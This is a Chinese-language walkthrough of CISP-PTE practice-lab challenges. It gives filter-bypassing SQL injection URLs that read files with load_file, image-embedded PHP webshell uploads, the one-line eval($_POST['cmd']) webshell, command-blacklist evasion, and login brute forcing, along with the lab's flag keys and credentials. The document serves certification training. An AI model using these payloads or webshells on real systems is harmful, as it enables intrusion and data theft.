CISP-PTE:记录基础题靶机做题思路
字数 959 2025-08-20 18:17:41

CISP-PTE基础题靶机解题思路详解

一、SQL注入绕过技巧

1. 过滤字符绕过方法

  • 空格过滤:使用%0a%0d代替%20
  • #号过滤:使用%23代替
  • union过滤:使用双写绕过(ununionion)

2. 注入步骤详解

  1. 确定字段数

    http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)%0dorder%0dby%0d4%23
    http://172.16.12.100:81/vulnerabilities/fu1.php?id=1%27)%0dorder%0dby%0d5%23
    
  2. 使用union注入读取文件

    http://172.16.12.100:81/vulnerabilities/fu1.php?id=10%27)%0dununionion%0dselect%0d1,load_file(%22/tmp/360/key%22),2,3%23
    
    • 使用load_file()函数读取/tmp/360/key文件
    • 获取key: 8b3h4a7v

二、文件上传突破技巧

1. 上传测试过程

  1. 直接上传.php文件被拦截
  2. 尝试.abcdef后缀无反应
  3. .png图片可以上传成功

2. 绕过方法尝试

  1. 修改请求包

    • 修改文件后缀为.php
    • 修改Content-Typeimage/png
    • 仍然被拦截,说明还检测文件头
  2. 制作图片马

    • 在图片中嵌入PHP代码
    • 修改后缀为.php4可被解析

3. 获取key

  • 使用蚁剑连接
  • /var/www/html/key.php中找到key: 8t5s0x5t

三、文件包含漏洞利用

1. 利用方法

  1. 写入PHP文件

    <?php phpinfo(); ?>
    
  2. 写入一句话木马

    <?php eval($_POST['cmd']); ?>
    

2. 获取key

  • 使用蚁剑连接
  • /var/www/html/key.php中找到key: 6u3x9t2p

四、命令执行绕过

1. 受限命令

  • catlsvimecho被禁用

2. 可用命令

  • findgrep未被禁用

3. 获取key步骤

  1. 使用find定位key.php文件
  2. 使用grep查找key关键字
  3. 获取key: 3s9j6c2k

五、日志分析技巧

1. 分析步骤

  1. IP过滤

    grep "172.16.12.12" 日志分析.txt >> 日志分析1.txt
    
  2. 状态码过滤

    grep "200" 日志分析1.txt >> 日志分析2.txt
    
  3. 发现关键页面

    • /adminlogin.php出现频率最高

2. 爆破登录

  1. 抓包使用字典爆破
  2. 获取凭证:
    • 账号: admin
    • 密码: password123
  3. 登录后获取key: 9y6u8s5m

六、工具推荐

  • 360星图日志分析工具

总结

  1. SQL注入:注意字符过滤绕过
  2. 文件上传:尝试多种绕过方式(后缀、Content-Type、文件头)
  3. 文件包含:利用写文件功能
  4. 命令执行:寻找未被禁用的替代命令
  5. 日志分析:分步过滤关键信息

通过以上方法可系统性地解决CISP-PTE基础题靶机中的各类漏洞利用问题。

CISP-PTE基础题靶机解题思路详解 一、SQL注入绕过技巧 1. 过滤字符绕过方法 空格过滤 :使用 %0a 或 %0d 代替 %20 #号过滤 :使用 %23 代替 union过滤 :使用双写绕过( ununionion ) 2. 注入步骤详解 确定字段数 : 使用union注入读取文件 : 使用 load_file() 函数读取 /tmp/360/key 文件 获取key: 8b3h4a7v 二、文件上传突破技巧 1. 上传测试过程 直接上传 .php 文件被拦截 尝试 .abcdef 后缀无反应 .png 图片可以上传成功 2. 绕过方法尝试 修改请求包 : 修改文件后缀为 .php 修改 Content-Type 为 image/png 仍然被拦截,说明还检测文件头 制作图片马 : 在图片中嵌入PHP代码 修改后缀为 .php4 可被解析 3. 获取key 使用蚁剑连接 在 /var/www/html/key.php 中找到key: 8t5s0x5t 三、文件包含漏洞利用 1. 利用方法 写入PHP文件 : 写入一句话木马 : 2. 获取key 使用蚁剑连接 在 /var/www/html/key.php 中找到key: 6u3x9t2p 四、命令执行绕过 1. 受限命令 cat 、 ls 、 vim 、 echo 被禁用 2. 可用命令 find 和 grep 未被禁用 3. 获取key步骤 使用 find 定位key.php文件 使用 grep 查找key关键字 获取key: 3s9j6c2k 五、日志分析技巧 1. 分析步骤 IP过滤 : 状态码过滤 : 发现关键页面 : /adminlogin.php 出现频率最高 2. 爆破登录 抓包使用字典爆破 获取凭证: 账号: admin 密码: password123 登录后获取key: 9y6u8s5m 六、工具推荐 360星图日志分析工具 总结 SQL注入:注意字符过滤绕过 文件上传:尝试多种绕过方式(后缀、Content-Type、文件头) 文件包含:利用写文件功能 命令执行:寻找未被禁用的替代命令 日志分析:分步过滤关键信息 通过以上方法可系统性地解决CISP-PTE基础题靶机中的各类漏洞利用问题。